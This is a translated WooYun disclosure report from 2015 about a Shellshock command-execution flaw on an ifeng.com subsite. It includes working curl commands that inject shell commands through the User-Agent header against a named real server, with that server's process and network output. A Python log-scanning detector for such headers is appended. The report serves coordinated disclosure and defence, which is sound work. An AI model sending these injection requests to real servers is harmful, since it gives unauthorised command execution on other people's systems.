
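Vulnerability Summary

Bug ID: wooyun-2015-0109492

Title: Remote command execution on an ifeng.com (凤凰网) subsite allows a shell and access to the internal network

Vendor: ifeng.com (凤凰网)

Author: 路人甲

Submitted: 2015-04-21 20:12

Fixed: 2015-06-06 09:58

Published: 2015-06-06 09:58

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor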

Source: http://www.wooyun.org; for questions or help, contact [email protected]

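Vulnerability Details

Disclosure status:

2015-04-21: Details reported to the vendor; awaiting vendor handling
2015-04-22: Vendor confirmed; details visible to the vendor only
2015-05-02: Details disclosed to core white hats and experts in related fields
2015-05-12: Details disclosed to regular white hats
2015-05-22: Details disclosed to intern white hats
2015-06-06: Details disclosed to the public

Brief description:

Remote command execution on an ifeng.com (凤凰网) subsite allows a shell and access to the internal network

Detailed description:

Remote command execution through the shell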
http://hd.ifeng.com:8082/cgi-bin/test-cgi

curl http://hd.ifeng.com:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
UID PID PPID C STIME TTY TIME CMD
nobody 31018 30868 0 20:10 ? 00:00:00 /bin/sh /home/abeight/apache/cgi-bin/test-cgi
nobody 31019 31018 0 20:10 ? 00:00:00 /bin/ps -ef

Proof of vulnerability:

curl http://hd.ifeng.com:8082/cgi-bin/test-cgi -A "() { foo;};echo;/sbin/ifconfig -a" -k
eth1 Link encap:Ethernet HWaddr 00:1E:C9:AB:39:04
inet addr:192.168.2.25 Bcast:192.168.2.255 Mask:255.255.255.0

Remediation:

Apply the patch

Copyright notice: when reposting, please credit the source 路人甲@乌云
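A defender-side check for the request shape shown in this report, added here as an example and not part of the original submission: it scans web server access logs for Referer or User-Agent values that begin with `() {`, the form the requests above use to reach bash through the CGI environment. It assumes Apache's combined log format (the server's actual LogFormat is not shown on the page); the function name and sample log lines are constructed for illustration.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# CGI copies request headers into environment variables; a value starting with
# "() {" has the shape of an exported bash function definition.
FUNC_DEF_RE = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample lines (documentation IP ranges), not taken from the affected server.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Apr/2015:20:10:01 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [21/Apr/2015:20:10:02 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 200 4096 "-" "() { foo;};echo;/bin/ps -ef"',
    '198.51.100.7 - - [21/Apr/2015:20:10:09 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 200 312 "-" "curl/7.29.0"',
    '203.0.113.5 - - [21/Apr/2015:20:11:30 +0800] "GET /news/list.php HTTP/1.1" 404 210 "() { foo;};echo" "Mozilla/5.0"',
]


def find_function_definition_headers(lines):
    """Return one finding per log line whose Referer or User-Agent starts with '() {'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # line is not in combined format; skip it
        fields = [n for n in ("referer", "agent") if FUNC_DEF_RE.match(m.group(n))]
        if not fields:
            continue
        parts = m.group("request").split()
        path = parts[1] if len(parts) >= 2 else ""
        findings.append({
            "line": lineno,
            "host": m.group("host"),
            "path": path,
            "fields": fields,
            "cgi": path.startswith("/cgi-bin/"),  # CGI targets deserve priority review
            "status": int(m.group("status")),
        })
    return findings


if __name__ == "__main__":
    for finding in find_function_definition_headers(SAMPLE_LOG):
        print(finding)
```

Hits with `cgi` set and a 200 status are the ones to triage first, alongside removing sample scripts such as `test-cgi` from production `cgi-bin` directories.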


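Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-04-22 09:56

Vendor reply:

Thank you very much for your help with ifeng.com (凤凰网) information security. This service belongs to Aibang (爱帮); the servers and network are both Aibang's. We are currently unable to reach the person responsible. If possible, this vulnerability could be submitted again at http://www.wooyun.org/corps/爱帮网. Thank you.

Latest status:

None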

